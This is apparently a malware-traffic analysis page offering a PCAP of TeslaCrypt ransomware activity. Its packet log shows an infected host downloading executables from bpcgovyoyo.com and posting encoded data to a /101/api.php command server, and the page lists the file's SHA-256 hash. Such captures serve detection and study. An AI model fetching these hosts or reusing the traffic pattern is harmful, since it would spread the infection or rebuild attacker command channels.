Tesla TeslaCrypt Ransomware Malware bpcgovyoyo.com POST /101/api.php PCAP File Download Traffic Analysis

Download Attachments

  • 1 pcap nv4
    Date added: November 30, 2017 2:54 am Added by: admin File size: 119 KB Downloads: 22


46 engines detected this file

2017-11-29 19:41:47.972453 IP 192.168.1.102.50978 > 101.99.69.129.80: Flags [P.], seq 2262608480:2262608969, ack 633486147, win 256, length 489: HTTP: GET /serv/nv4.exe HTTP/1.1
E…o.@….>…fecE..”.P…`%.;CP…….GET /serv/nv4.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: bpcgovyoyo.com/serv/nv4.exe
Connection: Keep-Alive

2017-11-29 19:42:15.366472 IP 192.168.1.102.50979 > 101.99.69.129.80: Flags [P.], seq 2844807322:2844807811, ack 746564504, win 256, length 489: HTTP: GET /serv/nv2.exe HTTP/1.1
E…q(@……..fecE..#.P..P.,…P…Hx..GET /serv/nv2.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: bpcgovyoyo.com
Connection: Keep-Alive

2017-11-29 19:42:32.665761 IP 192.168.1.102.50980 > 101.99.69.129.80: Flags [P.], seq 1569128606:1569129094, ack 3125156784, win 256, length 488: HTTP: GET /serv/me.exe HTTP/1.1
E…r.@….j…fecE..$.P]….F..P…_j..GET /serv/me.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: bpcgovyoyo.com
Connection: Keep-Alive

2017-11-29 19:42:56.666099 IP 192.168.1.102.50981 > 216.146.43.70.80: Flags [P.], seq 2884055042:2884055110, ack 1749298093, win 64240, length 68: HTTP: GET / HTTP/1.1
E..l5z@….*…f..+F.%.P..0.hD+.P…K…GET / HTTP/1.1
Host: checkip.dyndns.org
Connection: Keep-Alive

2017-11-29 19:42:58.076406 IP 192.168.1.102.50982 > 101.99.69.129.80: Flags [P.], seq 2817173057:2817173343, ack 2706750449, win 256, length 286: HTTP: POST /101/api.php HTTP/1.1
E..Fs.@……..fecE..&.P…A.U..P…Q…POST /101/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: bpcgovyoyo.com
Content-Length: 304
Expect: 100-continue
Connection: Keep-Alive

2017-11-29 19:42:58.443173 IP 192.168.1.102.50982 > 101.99.69.129.80: Flags [P.], seq 286:590, ack 1, win 256, length 304: HTTP
E..Xs.@……..fecE..&.P…_.U..P…….p=G1DZYwdIiDZ6V83seaZCmTmrH8bGtgoAAlt2qbVLnOyLjStMeUj5EDMrAykz7X6XKWP2MQdaG4Z7TYTe647jEdqYLYuTR%2BlFVl%2B5deG0RnTTo6nFc1M9tx0%2BRo7WXetRdIHkmVMMSeqH%2BEroM7yttDzosvKfKgB%2BJ07oqT/YvQ6CPNW2%2BCETCU6oIlO9XYyrEy6/hYeF%2BgkfRc9xSEfZhh/7Wk0khJ4zZJ3cjEvXDxJcQWA739/yDQSkgdgaDtY1OFOz8Pf/8DAB3/CA8eXFff4DpgX10NLp
2017-11-29 19:42:59.175776 IP 192.168.1.102.50982 > 101.99.69.129.80: Flags [P.], seq 590:852, ack 282, win 255, length 262: HTTP: POST /101/api.php HTTP/1.1
E…s.@….&…fecE..&.P…..U.
P…Nt..POST /101/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: bpcgovyoyo.com
Content-Length: 338
Expect: 100-continue

2017-11-29 19:42:59.447385 IP 192.168.1.102.50982 > 101.99.69.129.80: Flags [P.], seq 852:1190, ack 307, win 255, length 338: HTTP
E..zs.@……..fecE..&.P…..U.#P…_m..p=BEmO9zSQxPNbRWmt35dl4fby5EvpaDK6uvhnbpxEgc7Z7PyGZmOB/yDUXzbJplLU%2Bq5yZiJajbjVWTYJPdYVIkW5Tm2SdQs0QiT9WQvdrBGOJC1QobboYGKHWBBhNYG4iG3Y13rxlbCqR9kStLyM0ZUkcQKj11BudorK5fZ6UnnxWGG2N47xMTXHOG06O%2BtXV2jAVMKhsnLYJNncDHiM4Ed/BTDvYfcRRc9KYJjOkEV0zU5SIVgNldNQsIHvAP59EZ40BrlZCpT1eLkDmBH1SpZl2lDK3erEKpyuyato2kMDmgStDRvOG5yWeCqBClskwgOn6IMrW48=
2017-11-29 19:43:00.579911 IP 192.168.1.102.50982 > 101.99.69.129.80: Flags [P.], seq 1190:1452, ack 508, win 254, length 262: HTTP: POST /101/api.php HTTP/1.1
E…s.@….#…fecE..&.P…..U..P…J;..POST /101/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: bpcgovyoyo.com
Content-Length: 348
Expect: 100-continue

2017-11-29 19:43:00.835111 IP 192.168.1.102.50982 > 101.99.69.129.80: Flags [P.], seq 1452:1800, ack 533, win 254, length 348: HTTP
E…s.@……..fecE..&.P…..U..P…dL..p=EmZKrUTp3d4tHBRf%2BrVRl7iPcurRnBIe9ULxvMHZkPpi4S2ymyuLC7cWqmW4kObQZ%2ByigMKliGI0m/iQBuFuE0oj6eTxgPI2nB%2BCB6bF/nnf/NzEyQQBzGvCoRPg8UF5NFAAmVSq6JIcnNE33tg08yYqY30loz7e6nCaPgwHTQ7A5Oskuu92NpAhJTEMTeCPaXqGuJ2OoDeECs1S06j17MZ6CGT9IaIuBNIld7lvDDcglZKIcI1y6slZiZWU/OsPKY0koezcvb5OMolYj0aGWWubd6AOJz%2B4MkR32N8/M%2B2/14xE/aM/T/oLI%2B%2BzWx4NpyQ8EYpeens=
2017-11-29 19:43:03.870462 IP 192.168.1.102.50983 > 101.99.69.129.80: Flags [P.], seq 241649466:241649956, ack 21904899, win 256, length 490: HTTP: GET /serv/frv2.exe HTTP/1.1
E…s.@….9…fecE..’.P.gG:.N>.P….O..GET /serv/frv2.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: bpcgovyoyo.com
Connection: Keep-Alive

2017-11-29 19:43:07.095789 IP 192.168.1.102.50984 > 101.99.69.129.80: Flags [P.], seq 3343248182:3343248444, ack 771995862, win 256, length 262: HTTP: POST /101/api.php HTTP/1.1
E…tL@……..fecE..(.P.E.6….P…e…POST /101/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Host: bpcgovyoyo.com
Content-Length: 314
Expect: 100-continue

2017-11-29 19:43:07.348650 IP 192.168.1.102.50984 > 101.99.69.129.80: Flags [P.], seq 262:576, ack 26, win 256, length 314: HTTP
E..bt_@….D…fecE..(.P.E.<….P…^Q..p=F0ZNqdxq2I/la8QaFAPjijmrH8bGtgoAAlt2qbVLnOyLjStMeUj5EDMrAykz7X6XKWP2MQdaG4Z7TYTe647jEXZ8iPkGx9o6AboTLtKFE8XUfePVFUVPdE6nJpbZK8wKkRnCzAVzEv6jX24nEj/A3t/AswHfHfQa06OpxXNTPbcdPkaO1l3rUXSB5JlTDEnqh/hK6DO8rbTZeRrpi47Mq2zpyXEr/M/ZVXllPgf09svD8fSEnRpoQ/Yi5M1vR0sGIyHs9UzQYKgMCTyR22BDjCDmB42gUoJPjcbnAO8lyNkq/1WthMdFeg==


SHA-256 666e43d330727d7c0313b300a768d6cea2da6bdae80cf2675f1ad4e02fd81589
File name output.112494122.txt
File size 1.01 MB
Last analysis 2017-11-29 03:05:38 UTC

